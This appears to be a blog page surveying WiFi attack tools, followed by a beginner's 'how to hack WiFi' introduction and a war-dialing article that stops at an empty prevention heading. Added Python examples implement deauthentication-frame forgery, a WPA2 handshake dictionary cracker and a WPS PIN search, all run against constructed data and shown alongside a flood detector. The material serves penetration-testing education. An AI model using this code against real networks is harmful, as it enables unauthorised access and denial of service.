Hacking Software for WiFi Security Professionals

Security professionals need to be intimately familiar with a huge assortment of hacking software. There are literally thousands of hacking tools available for download. Some of them are free, some must be purchased, and some are open source. Some of them are gold, and some of them are very poor.

And let’s not forget that a lot of hacking software you find may just be trojan horses in disguise. Think about it, if you’re a malicious hacker who wants to sucker a bunch of people into giving you access to their computers, what are you going to do?

You could code a “hacking tool” and offer it for download, meanwhile add in a hidden keylogger and maybe a bot client as well…

Be careful what you download. That goes without saying. The tools in the following list, however, are legitimate, widely used open-source projects. Get them from their official project sites or from your distribution's package repositories rather than from a random download mirror, and you will not be installing a keylogger along with them. These tools are used every day by thousands of IT security professionals and penetration testers, and you should get to know them if you want to get paid to do this stuff. Keep reading for my list of WiFi hacking software. All of the tools listed are used in one or more of my tutorials on this site.

WiFi Hacking Software

The alphabetical list of tools used in the tutorials on this website:

  • Airbase
  • Aircrack
  • Aireplay
  • Airmon
  • Airodump
  • Cowpatty
  • Crunch
  • Fern WiFi Cracker
  • Gerix
  • Hashcat
  • John the Ripper
  • Macchanger
  • MDK3
  • Pyrit
  • Reaver
  • Wireshark

Don’t be alarmed. This is a lot to take in, but I’ll break the tools down and explain what they do here. My other articles detail how to use them and what you can do with them.

Hacking Software for Security Professionals

Airbase-ng

There are a ton of uses for airbase-ng, but one of the most useful is standing up a fake access point. Attackers regularly use airbase-ng to create rogue access points, either an open network with an enticing name like “Free WiFi” or an “evil twin” that answers to the name of a network the victim already trusts, to trick users into connecting to them. Security professionals use it the same way, to test whether company devices will join an unknown access point, or auto-reconnect to a spoofed copy of a known one, and leak traffic. You should learn how this tool works.

Aircrack-ng

Aircrack-ng is the granddaddy of WiFi cracking tools, and also the name of the suite that airbase-ng, aireplay-ng, airmon-ng and airodump-ng belong to. It can crack WEP, WPA, and WPA2 networks. It recovers WEP keys by statistical analysis of captured IVs, and WPA/WPA2 pre-shared keys by running a dictionary against a captured four-way handshake. It runs best on Linux and comes preinstalled on BackTrack and Kali.

Aireplay-ng

Aireplay-ng is a frame injection tool. It generates and injects 802.11 frames and is usually run in conjunction with airodump-ng and aircrack-ng. Why would you want to inject traffic at the access point you’re targeting? Two reasons. For WEP, replaying captured ARP requests makes the access point emit thousands of fresh IVs, which is exactly what aircrack-ng’s statistical attack needs, so injection cuts the cracking time from hours to minutes. For WPA and WPA2, a deauthentication attack kicks a connected client off the network so that it reconnects and you can capture the four-way handshake.

Airmon-ng

Airmon-ng puts your wireless adapter into monitor mode, which is what lets airodump-ng see raw 802.11 frames rather than only the traffic addressed to you. Injection is not a mode you switch on; it is a capability of the chipset and driver, so you need an adapter that supports it, like the Alfa wireless adapter line. Expect airmon-ng to warn you about processes (network managers, wpa_supplicant) that will interfere with monitor mode; stop them first, for example with airmon-ng check kill. We use airmon-ng a LOT on this website.

Airodump-ng

Airodump-ng sniffs 802.11 traffic and writes it to a capture file. It also lists the access points it sees (BSSID, channel, encryption, signal) and the clients associated with each, which is how you pick a target and lock onto its channel. We use airodump-ng quite a lot as well, especially when attacking WEP and WPA or WPA2 networks: it stores the IVs, or the four-way handshake, that we will later feed to the password cracking tools.

Cowpatty

Cowpatty is WPA and WPA2 cracking software. It attacks a captured WPA/WPA2 handshake with a dictionary, or much faster with precomputed tables of PMKs built by its companion tool genpmk. These are not general-purpose rainbow tables: the SSID is the salt in WPA’s PBKDF2 key derivation, so a table is only valid for the exact SSID it was generated for.

Crunch

Crunch is a wordlist generator. You give it a length range, such as 1 through 8 characters, and a character set, such as upper- and lowercase English letters plus digits, and it writes out every string of those lengths over that character set (a Cartesian product, not merely the combinations or permutations). It can also expand a pattern in which only some positions vary. Piped into a cracker, this is a brute-force attack in dictionary form, so watch the size: every string of length 1 to 8 over 62 characters is about 2.2 × 10^14 candidates, and since a WPA passphrase is at least 8 characters, everything shorter is wasted effort.
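The generation crunch does, as an added example in Python (this is not crunch’s own code): a character set over a length range, or a mask in crunch’s -t notation where @ is a lowercase letter, , an uppercase letter, % a digit and ^ a symbol. The symbol set and the Corp%%%% mask are constructed for the illustration, and the wpa_eligible filter is the check a practitioner adds before feeding candidates to a WPA cracker.

```python
"""Crunch-style wordlist generation (added illustration, not crunch's code):
a charset over a length range, or a mask in crunch -t notation
(@ = lowercase, , = uppercase, % = digit, ^ = symbol)."""
import itertools
import string

ALNUM = string.ascii_letters + string.digits   # the 62-character set from the text

# Constructed symbol set; crunch's built-in one is larger.
MASK_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_=+",
}


def charset_words(charset, min_len, max_len):
    """Yield every string of length min_len..max_len over charset, shortest first.
    This is a Cartesian product: characters may repeat and order matters."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def charset_count(charset, min_len, max_len):
    """Number of candidates charset_words() will produce: sum of |charset|^n."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def mask_words(mask):
    """Expand a mask: literal characters stay fixed, class placeholders vary.
    'Corp%%%%' yields Corp0000 .. Corp9999."""
    slots = [MASK_CLASSES.get(ch, ch) for ch in mask]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def mask_count(mask):
    """Number of candidates mask_words() will produce."""
    count = 1
    for ch in mask:
        count *= len(MASK_CLASSES.get(ch, ch))
    return count


def wpa_eligible(word):
    """WPA/WPA2 passphrases are 8 to 63 printable ASCII characters; anything else
    can never be the key, so drop it before spending PBKDF2 time on it."""
    return 8 <= len(word) <= 63 and all(32 <= ord(c) <= 126 for c in word)


def estimated_file_size(count, avg_len):
    """Approximate bytes on disk: one newline per candidate."""
    return count * (avg_len + 1)


if __name__ == "__main__":
    n = charset_count(ALNUM, 1, 8)
    print(f"1-8 chars over {len(ALNUM)} symbols: {n:,} candidates, "
          f"about {estimated_file_size(n, 7.9) / 1e15:.1f} PB on disk")
    print(f"Corp%%%% expands to {mask_count('Corp%%%%'):,} candidates, first:",
          next(mask_words("Corp%%%%")))
```

The mask form is the one worth learning: a company name followed by four digits is ten thousand candidates and finishes in seconds, while the full 1-to-8 character sweep would not fit on any disk you own. Crunch itself can be piped straight into a cracker (aircrack-ng accepts -w - to read candidates from standard input) so the list never has to be written out.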

Fern WiFi Cracker

Fern WiFi Cracker is a GUI (Graphical User Interface) tool for cracking WEP and WPA networks. It attacks WPA either with a dictionary file or through the WPS PIN weakness. If you can’t handle command line tools, you can use Fern: it offers a point-and-click interface and is very easy to figure out. (However, you’ll probably be made fun of if you can’t do your job with the command line tools.)

Gerix

Gerix is another GUI WiFi hacking tool, a graphical front end for the aircrack-ng suite. Again, use it if you have to, but you should really learn all the command line tools as well. Don’t cop out by sticking to GUI hacking tools.

Hashcat

Hashcat is another flavor of WPA cracking software, and it claims to be the fastest WPA cracker available because it runs the PBKDF2 key derivation on GPUs. I haven’t tested that, but hashcat is a great tool to have on your resume. Hashcat is a lot more powerful than most of the other tools we use, because it lets you combine a ton of different attack modes: brute force with masks, dictionary, combination, and hybrid dictionary/mask attacks, plus rule-based mangling of the wordlist. It takes the handshake in its own format rather than a raw capture file, so there is a conversion step first. You’ll learn all about this in my hashcat tutorial.

John the Ripper

John the Ripper is a well known and widely used password cracking tool. We can also turn John loose on WPA and WPA2 pre-shared keys: the jumbo build converts a capture containing the handshake into John’s own format and then applies the same wordlist and rule machinery it uses for ordinary password hashes.

Macchanger

Macchanger isn’t hacking software in itself, but it lets us change our wireless adapter’s MAC address, which defeats MAC-address allow-lists and makes captures harder to attribute to our hardware. It’s a tool and technique that malicious hackers use often, so you should be familiar with it. One caveat: a fully random MAC with the locally-administered bit set stands out to a wireless IDS or NAC system, which is why macchanger can also keep the original vendor prefix and randomise only the remaining bytes.

MDK3

MDK3 (the name is usually expanded as Murder, Death, Kill 3) is a denial of service tool for WiFi networks. If you can’t hack it, DoS it. MDK3 offers many ways to flood an access point and keep legitimate users off it: deauthentication floods, fake-client authentication floods, beacon floods with bogus SSIDs, and more. All of these are only appropriate on networks you are authorised to test, and a network running protected management frames (802.11w) will ignore the forged deauthentication and disassociation frames that most of them rely on.
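The deauthentication frame that aireplay-ng’s deauth attack and MDK3’s deauth flood both send, built and parsed by hand, followed by the detection rule a wireless IDS applies to it. This is an added example, not code from either tool: the frames carry no radiotap header or FCS, the duration value and the addresses are constructed, and the sample capture is fabricated to show one legitimate deauth next to a flood.

```python
"""802.11 deauthentication frames as injected by aireplay-ng --deauth and mdk3 d,
plus a detection rule for the resulting flood. Added example: frames are built and
parsed by hand (no radiotap header, no FCS) and the capture below is constructed."""
import struct
from collections import defaultdict, deque

BROADCAST = bytes.fromhex("ffffffffffff")
DEAUTH_FC = 0x00C0                  # frame control: version 0, type 0 (management), subtype 12
REASON_CLASS3_NOT_ASSOC = 7         # "class 3 frame received from nonassociated STA"
HDR_FMT = "<HH6s6s6sHH"             # fc, duration, addr1, addr2, addr3, seq-ctrl, reason code
HDR_LEN = struct.calcsize(HDR_FMT)  # 26 bytes


def build_deauth(receiver, transmitter, bssid, reason=REASON_CLASS3_NOT_ASSOC, seq=0):
    """Forge one deauthentication frame. An attacker sets transmitter to the AP's
    address (to kick a client) or to the client's address (to make the AP drop it)."""
    return struct.pack(HDR_FMT, DEAUTH_FC, 0x013A, receiver, transmitter, bssid, seq << 4, reason)


def parse_deauth(frame):
    """Return (receiver, transmitter, bssid, reason) if frame is a deauth, else None."""
    if len(frame) < HDR_LEN:
        return None
    fc, _dur, a1, a2, a3, _seq, reason = struct.unpack(HDR_FMT, frame[:HDR_LEN])
    if fc & 0x00FC != 0x00C0:       # keep type+subtype bits, ignore version and flags
        return None
    return a1, a2, a3, reason


def detect_deauth_flood(events, threshold=10, window=1.0):
    """events: iterable of (timestamp_seconds, raw_frame). Raise one alert per transmitter
    address that sends >= threshold deauth frames within any window-second span.
    Because the frames are spoofed, the alert names the impersonated address (usually
    the AP itself); the rate, not the source address, is what identifies the attack."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, frame in events:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        receiver, transmitter, bssid, reason = parsed
        q = recent[transmitter]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and transmitter not in alerted:
            alerted.add(transmitter)
            alerts.append({"time": ts, "transmitter": transmitter.hex(":"),
                           "bssid": bssid.hex(":"), "count": len(q),
                           "broadcast": receiver == BROADCAST, "reason": reason})
    return alerts


# Constructed sample: one legitimate deauth from the AP at t=5 s, then an attacker
# spoofing the AP's address and broadcasting 30 deauths in 1.5 s starting at t=10 s.
AP = bytes.fromhex("001122aabbcc")
CLIENT = bytes.fromhex("00aabbccddee")


def make_sample_events():
    events = [(5.0, build_deauth(CLIENT, AP, AP, reason=3, seq=17))]
    events += [(10.0 + i * 0.05, build_deauth(BROADCAST, AP, AP, seq=i)) for i in range(30)]
    events.append((10.5, b"\x80\x00" + b"\x00" * 30))   # a beacon-like frame, ignored
    return events


if __name__ == "__main__":
    for alert in detect_deauth_flood(make_sample_events()):
        print(alert)
```

Note what the alert contains: the transmitter is the access point’s own address, because that is what the attacker put in the frame. A real AP sends a handful of deauths a day, not ten a second, so the rate is the signal; attribution to the real sender takes sequence-number or signal-strength analysis, and prevention takes 802.11w on both the AP and the clients.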

Pyrit

Pyrit precomputes PMKs, the expensive PBKDF2 step of WPA/WPA2 cracking, for a list of candidate passphrases against a given SSID and stores them in a database, using GPUs for speed; the stored PMKs can then be tested against any handshake captured from that SSID. In that sense Pyrit is similar to hashcat, though it is no longer actively maintained.
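What aircrack-ng, Cowpatty, hashcat, John the Ripper and Pyrit all do under the hood when they “crack WPA2”, as one added example in plain Python (not any of those tools’ code): derive the PMK from a candidate passphrase and the SSID, derive the PTK from the PMK, both MAC addresses and both nonces, and check whether the resulting key reproduces the MIC in the captured second handshake message. The SSID, MAC addresses, nonces, wordlist and secret passphrase are constructed, and the “captured” frame is built by the same code with the secret, so there is no real traffic involved; the precompute_pmks function shows why a Pyrit or genpmk table is tied to one SSID.

```python
"""WPA2-PSK four-way-handshake dictionary attack, as run by aircrack-ng, Cowpatty,
hashcat, John and Pyrit, implemented in plain Python against a constructed capture."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # EAPOL header (4) + key fields before the MIC (77)
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). The SSID is the
    salt, which is why precomputed PMK tables (genpmk, Pyrit) are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i in 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK, both MACs and both nonces; its first 16 bytes are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the EAPOL frame with the
    MIC field zeroed, truncated to 128 bits."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_key_msg2(snonce, key_data, mic=b"\x00" * MIC_LEN):
    """Minimal EAPOL-Key message 2 (client -> AP) with the layout the MIC covers."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: HMAC-SHA1, pairwise, MIC present
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID
            + mic
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL v1, type EAPOL-Key


def precompute_pmks(ssid, wordlist):
    """Pyrit/genpmk-style table: one PMK per candidate, valid only for this SSID."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist, pmk_table=None):
    """Try each candidate; the right one reproduces the MIC captured in message 2.
    Returns (passphrase, attempts) or (None, attempts). With pmk_table the PBKDF2
    step is skipped, which is the whole speed-up of a precomputed table."""
    target = eapol_frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for attempts, candidate in enumerate(wordlist, 1):
        pmk = pmk_table[candidate] if pmk_table else pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), target):
            return candidate, attempts
    return None, len(wordlist)


# --- Constructed sample "capture" (not real traffic): an AP, a client and a message 2
#     whose MIC was computed with the secret passphrase below. ---
SAMPLE_SSID = "CorpGuest"
SAMPLE_AP = bytes.fromhex("001122aabbcc")
SAMPLE_STA = bytes.fromhex("00aabbccddee")
SAMPLE_ANONCE = hashlib.sha256(b"anonce-seed").digest()
SAMPLE_SNONCE = hashlib.sha256(b"snonce-seed").digest()
SAMPLE_RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
_SECRET = "sunflower2014"
SAMPLE_WORDLIST = ["password", "letmein", "CorpGuest1", "sunflower2014", "12345678"]


def make_sample_capture():
    kck = ptk_from_pmk(pmk_from_passphrase(_SECRET, SAMPLE_SSID),
                       SAMPLE_AP, SAMPLE_STA, SAMPLE_ANONCE, SAMPLE_SNONCE)[:16]
    unsigned = build_eapol_key_msg2(SAMPLE_SNONCE, SAMPLE_RSN_IE)
    frame = build_eapol_key_msg2(SAMPLE_SNONCE, SAMPLE_RSN_IE, mic=eapol_mic(kck, unsigned))
    return dict(ssid=SAMPLE_SSID, ap_mac=SAMPLE_AP, sta_mac=SAMPLE_STA,
                anonce=SAMPLE_ANONCE, snonce=SAMPLE_SNONCE, eapol_frame=frame)


if __name__ == "__main__":
    cap = make_sample_capture()
    print(crack_handshake(**cap, wordlist=SAMPLE_WORDLIST))
    table = precompute_pmks(SAMPLE_SSID, SAMPLE_WORDLIST)
    print(crack_handshake(**cap, wordlist=SAMPLE_WORDLIST, pmk_table=table))
```

Two things to take from this. Everything the attacker needs (SSID, both MACs, both nonces and one MIC) is in the clear in the capture, which is why a handshake can be cracked offline and why the only defences are a passphrase that is not in anyone’s wordlist and, longer term, an authentication method that does not expose a dictionary-checkable value. And the cost is entirely in the 4096-round PBKDF2: that is what GPUs in hashcat and Pyrit accelerate, and what a precomputed table removes, at the price of the table being useless against any other SSID.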

Reaver

Reaver is one of the best WiFi hacking tools available, because it can recover a WPA2 pre-shared key WITHOUT dictionary files, brute force, or precomputed tables. Reaver does not attack the WPA2 passphrase directly like the other tools do. It attacks WPS (WiFi Protected Setup), a feature meant to let you join a network by typing an 8 digit PIN printed on the router. The flaw is in the protocol: the access point confirms the first four digits of the PIN separately from the last four, and the eighth digit is a checksum of the other seven, so an attacker needs at most 10,000 + 1,000 = 11,000 guesses instead of 100 million. Once the PIN is accepted, the access point hands over the actual WPA2 passphrase. Not all WiFi networks have WPS enabled, but those that do are at risk from a Reaver attack, although many newer access points lock WPS after a few failed PIN attempts, which slows the attack down considerably.
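The arithmetic behind that 11,000 figure, as an added example (not Reaver’s code): the WPS PIN checksum, and a search that uses the access point’s separate answers for each half of the PIN. SimulatedRegistrar is a stand-in that mimics only the information leak Reaver exploits (which half of the PIN failed, and an optional lockout after a number of failures); it does not speak the real WPS/EAP exchange, and the PIN 12345670 is just a valid example value.

```python
"""Why Reaver needs at most 11,000 guesses: the WPS PIN checksum and the split
verification of the two PIN halves. Added example with a simulated registrar that
mimics only the leak Reaver exploits; it does not speak the real WPS/EAP protocol."""

MAX_ATTEMPTS = 10_000 + 1_000    # first half (4 free digits) + second half (3 free + checksum)


def wps_checksum_digit(first7):
    """Eighth PIN digit: a weighted checksum over the first seven, per the WPS specification."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin8):
    return (len(pin8) == 8 and pin8.isdigit()
            and int(pin8[7]) == wps_checksum_digit(int(pin8[:7])))


class SimulatedRegistrar:
    """Stand-in for an access point's WPS registrar. A real AP answers message M4
    only if the first half of the PIN was right, and M6 only if the second half was
    right too, so each NACK tells the attacker which half failed."""

    def __init__(self, pin8, lock_after=None):
        assert is_valid_wps_pin(pin8)
        self.pin = pin8
        self.attempts = 0
        self.failures = 0
        self.lock_after = lock_after   # None = no lockout (older firmware)
        self.locked = False

    def try_pin(self, pin8):
        self.attempts += 1
        if self.locked:
            return "LOCKED"
        if pin8[:4] != self.pin[:4]:
            self._failed()
            return "NACK_M4"           # first half wrong
        if pin8[4:] != self.pin[4:]:
            self._failed()
            return "NACK_M6"           # first half right, second half wrong
        return "OK"                    # the AP would now send the WPA2 passphrase in M7

    def _failed(self):
        self.failures += 1
        if self.lock_after and self.failures >= self.lock_after:
            self.locked = True


def reaver_search(registrar):
    """Phase 1: 10^4 candidates for the first half. Phase 2: 10^3 candidates for the
    second half, since the eighth digit is forced by the checksum. Returns the PIN,
    or None if the registrar locks or the PIN is somehow invalid."""
    first = None
    for a in range(10_000):
        cand = f"{a:04d}"
        reply = registrar.try_pin(cand + "0000")
        if reply == "LOCKED":
            return None
        if reply != "NACK_M4":         # NACK_M6 or OK: first half confirmed
            first = cand
            break
    if first is None:
        return None
    for b in range(1_000):
        second = f"{b:03d}"
        second += str(wps_checksum_digit(int(first + second)))
        reply = registrar.try_pin(first + second)
        if reply == "LOCKED":
            return None
        if reply == "OK":
            return first + second
    return None


if __name__ == "__main__":
    reg = SimulatedRegistrar("12345670")
    print(reaver_search(reg), "after", reg.attempts, "attempts (worst case", MAX_ATTEMPTS, ")")
    locked = SimulatedRegistrar("12345670", lock_after=10)
    print(reaver_search(locked), "locked:", locked.locked)
```

A naive attacker who treated the PIN as one 8-digit secret would face 10^8 possibilities; the split acknowledgement reduces that to 10^4 + 10^3, and the checksum removes one more digit of freedom. The lock_after behaviour is what newer firmware adds, and it is the reason Reaver has options to pause between attempts and to detect a locked registrar rather than burning through guesses that all return the same answer.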

Wireshark

Wireshark is a network protocol analyser. Running it on an interface in monitor mode, we can capture and inspect the WPA four-way handshake for later cracking (the display filter eapol isolates the EAPOL-Key frames that make it up). We can also use Wireshark once we are connected to the wireless network in order to sniff client data.


So there you have it. A very quick breakdown of wireless hacking software. The tutorials and videos on this site use all of these hacking tools at least once, so you will gain a great understanding of how they work and be on your way to a successful IT security career.

How to Hack WiFi – Learn How to Do It For Free Here

Obviously you have found this page because you hope to learn how to hack WiFi.

But, it is just as important to understand how to secure WiFi. This website is all about information. You’ll find everything you need here, from WEP WiFi hacks to more advanced WiFi password hacks. But pace yourself. Start here. You need a foundation before anything else.

Wireless network security is as important today as locking your front door before bed every night. As I will show you below, using poor or no wireless security measures can actually get you into some serious trouble. I don’t mean a slap on the wrist from your Internet Service Provider, either. I’m talking about real, federal-prison-style trouble. You may think I’m lying. You may be wondering, how can having an insecure wireless network get me into trouble? So what if my WiFi security isn’t strong? It’s my access point and I can do whatever I want with it! For a real life example of just how dangerous insecure WiFi networks are, read about the guy who decided to hack his neighbor’s WiFi.

This is the wrong way to think about the problem. Everyone should make an effort to learn, expand on, and properly implement WiFi security in their own homes and businesses. Get your hands dirty. For security administrators and consultants, knowing how to hack WiFi is a basic requirement of the job. But everyone should know how to secure a wireless access point. And, I believe, everyone should also know how to hack WiFi. Why? The more we know, the better able we are to deal with the problem. Believe me, you don’t want to be under police suspicion because someone else did illegal activities on your network. It’s about liability.

Why should you know how to hack WiFi?

You must know your enemy, how he is likely to act, what hacking tools he is likely to use, and how he is likely to use them. You must learn all of this, and more, before you can beat him. If you do, you are in a much better position to prevent wireless attacks.

You are empowered.

If you still think that the idea of getting in legal trouble for an insecure WiFi network is absurd, consider that in many areas, having a swimming pool in your yard means you must also have some sort of fence enclosing the yard to keep others from getting into the pool and possibly drowning. Again, it all comes back to liability. (And yes, you can find yourself answering for crimes committed from your network!)

At the end of the day it’s all about awareness – a truth in all aspects of our lives.

As an information security consultant or wireless security auditor, you may need to hack WiFi in the field as part of a particular engagement. Or, your boss may have tasked you on Friday afternoon to test the company’s wireless access points against an outside intruder. Tools already exist which can automate much of this process, but knowing the nuts and bolts of how something is accomplished is very important, especially when troubleshooting problems, expanding on ideas, and deciding what the best method is in any given situation. So, why learn it all over again? Isn’t it reinventing the wheel?

The answer, I believe, is no.

Wireless security auditors, consultants, and administrators have a unique position in the InfoSec industry to be able to combat cyber-crimes such as the one in the neighbor story above. These professionals are on the front lines of defense, and they must know how to hack WiFi and secure it in order to protect against stories like that. Hackers will not stop at a password-protected access point. They have plenty of tools and tricks to break into practically anything they’re put up against. WiFi hackers can just as easily crack a password using a dictionary attack, for instance, and then commit a crime on your network, i.e. in your name. As the Internet and the real world continue to merge, network security (and particularly WiFi security) becomes more vital.

So how would you hack WiFi? With this website you’re more than halfway there. All the lessons on this website are free, easy to follow, detailed articles and many with supporting videos. (I’d recommend looking at both to maximize your understanding of how to hack WiFi). There are some additional things you will need to own or buy. It won’t be expensive.

How to hack WiFi Step by Step

You’ll need two things:

1. Before you can understand how to hack WiFi, the very first thing you’ll want to do is download Kali Linux (or a copy of BackTrack, if you can find one: Kali Linux replaced BackTrack in 2013). I still have lots of copies lying around on both live CDs and live USB sticks, and I refer to BackTrack in many of my tutorials because they were written a few years ago. However, the commands work the same on either the latest Kali Linux or an older version of BackTrack Linux.

What are Kali Linux and BackTrack Linux?

You might have heard of Linux and know it is a computer operating system, but not much else. Linux is indeed an operating system, but it is used on far fewer desktops than Windows: the large majority of home and office computers around the world run Microsoft Windows (most recently Windows 10 and 11). However, many servers (the computers which are the backbone of the internet) run a Linux-based operating system. Linux is generally less hand-holding and requires more technical knowledge, such as use of the command-line interface.

One of the main differences with Kali Linux or BackTrack Linux is that you can run it from a live CD or live USB: an entire operating system loaded onto a CD or USB stick that you plug into ANY desktop or laptop computer without installing it. Normally, when you press the power button on a computer running Windows 10 or 11 it loads Windows, and everything you do gets recorded and logged somewhere on the hard drive. When you fire up Kali Linux or BackTrack from a live CD or live USB, nothing is written to the machine’s internal drive unless you deliberately set up a persistence partition. That makes it a very convenient toolkit, but don’t mistake it for invisibility: the access points you talk to, and anyone monitoring the airwaves, still see your adapter’s MAC address and every frame you send.

Both are special penetration testing operating systems. Yes, an entire OS loaded with a dizzying array of hacking tools. Either Kali or BackTrack will do. As Kali Linux is the successor to BackTrack, you should be able to follow along with the video hacking tutorials and articles with either version. (I will be using a mix of BackTrack and Kali for my video tutorials.)

2. You will also need a wireless adapter capable of packet injection. Injection means transmitting raw 802.11 frames of our own construction (management frames such as deauthentications, or replayed data frames) so that the access point and the clients around it treat them as legitimate, ideally without anyone noticing that they were injected at all. Most consumer adapters and their drivers will only send ordinary data frames as an associated client; injection needs a chipset and driver that expose monitor mode with transmit support.

One of the best wireless adapters that supports packet injection (and works in BackTrack and Kali) is the Alfa USB wireless network adapter. This thing rocks, and with its external antenna it can pick up WiFi networks from a range of a few hundred meters. Place it outside within 100 meters of your target access point and it will almost certainly see it. So, in addition to BackTrack or Kali, you will definitely need an Alfa card like the one below.

ALFA-AWUS036H

Once again, you WILL need one of these adapters to follow my how to hack WiFi lessons. If your existing wireless adapter can’t enter packet injection mode, none of what I teach here will work.

With that said, I invite you to look around here. You’ll find a huge assortment of hacking tutorials and articles. Think of these as your Entry Level 101 classes. From here, you’ll understand how to hack WiFi using a variety of methods and technologies. If you’re new to all of this, I’d definitely recommend checking out all the general stuff first before diving into the harder stuff. And yes, there are plenty of more advanced methods to hack WiFi. Wireless security consultants and security administrators (and anyone who does know a thing or two about WiFi hacks) can skip ahead to the more advanced tricks. No matter what kind of wireless security you’re up against, you’ve stumbled on the mother lode.  

This will teach you how to hack WiFi. Dive in.

War Dialing Returns – Modem and VOIP Security

For anyone who hasn’t seen the movie WarGames, you may not know what war dialing is. Some of you might know about war dialing, but wrongly assume that it’s an outdated hacking method that doesn’t even work nowadays. Either way, I encourage you to check out this information-packed article on war dialing and how it can affect network and computer security even today. The truth is, war dialing is still a threat. The nature of the threat has just changed a little.

Aspiring IT security experts should be well-versed in war dialing. It’s an old technique, some may even say ancient. But it still happens today, and with the rise in Voice over IP telephone systems (VOIP systems), war dialing may even be making a big comeback.

In the late ’80s and throughout most of the ’90s, war dialing was a constant threat to IT systems worldwide. The Internet was still in its infancy, and computer security concepts were even younger. War dialers of the day would exploit company telephone and private branch exchange (PBX) systems, breaking inside the organization to steal data or map the internal networks. Attackers of that era relied on war dialing tools such as THC Scan.

THC Scan was an old-school DOS program that gave attackers a fair degree of automation. With this tool, attackers could automatically dial telephone numbers from a predetermined range or from a list of specific telephone numbers. THC Scan was also able to detect voice message systems or answering machines. Often, attackers would pair THC Scan with another tool, THC Login Hacker. The two tools in tandem allowed an attacker to war dial a set of telephone numbers and then brute force or guess the passwords set on the modems, voice mail and PBX systems that answered. Often, these passwords were extremely short and easy to guess. Many times the passwords had not been changed from their manufacturer default values.

As time went on, and the field of computer security began to mature, the rate of war dialing attacks began to drop. It’s now considered a legacy method of hacking, and is pretty rare to see security professionals discuss it. Mostly, war dialing has been forgotten. But it shouldn’t be, because it’s still a very dangerous method of attacking computer systems. Why?

Because, even after almost 30 years, war dialing is still pretty effective. And with more people now working from home and connecting to the internet for work, this type of attack, well, still works.

Remember, a war dialing program can be set to systematically dial thousands of telephone numbers. These programs will dial again and again, searching for modems or other telephony systems that answer.

New War Dialing Tools

With the rise in Voice Over IP (VOIP) telephone systems, war dialing has made a comeback. There are a host of new tools attackers are using to continue their assault against computer networks. Security professionals need to be aware of these new war dialing methods. Penetration tests (black, white, or grey box) should include war dialing as a part of the security audit or vulnerability assessment. If your network has any sort of security hole or vulnerability through a networked telephone system, you want to find out about it before the bad guys do.

Remember, war dialing isn’t just about hacking modems anymore (even though that’s still a part of it). Nowadays, war dialing is also about attacking VOIP systems. A VOIP system carries calls over the IP network rather than over dedicated phone lines, which means the computers, servers, and wireless access points often share the same Ethernet cables and switches that the telephones do.

Windows War Dialing Tools

TeleSweep is a free modem vulnerability scanner that you can grab from the SecureLogix website. Think of it as an updated THC Scan, with more features aimed at today’s telephone systems.

Security professionals can configure TeleSweep to dial their corporate telephone numbers and report which lines have modems answering. Modem connections are often weakly configured, or left at their default settings, and they are a forgotten (and dangerous) backdoor into the inside of your LAN. Malicious hackers and other outside intruders use tools just like TeleSweep to find them and gain unauthorized access to your network.

VOIP War Dialing

VOIP telephone systems are all the vogue now. However, the newest technologies often aren’t the most secure; security lags new technology. VOIP lets telephones and computers share the same physical network cables, switches, and firewalls. It is a breakthrough in cost savings and ease of use: companies no longer need dedicated phone lines and can simply route all voice and data through the same hardware. Because of this, however, hackers are reviving war dialing and developing new tools to war dial more effectively than ever.

Warvox War Dialing Software

WarVOX is a suite of tools for exploring, classifying, and auditing telephone systems. Unlike traditional war dialing tools, WarVOX does not use a modem at all: it places its calls through a VOIP provider and records and analyses the audio of each call that answers. Because it works from the audio rather than from a modem handshake, WarVOX can discover and classify a wide range of interesting lines, including modems, fax machines, voice mail boxes, PBXs, and VOIP systems.

War Dialing Prevention

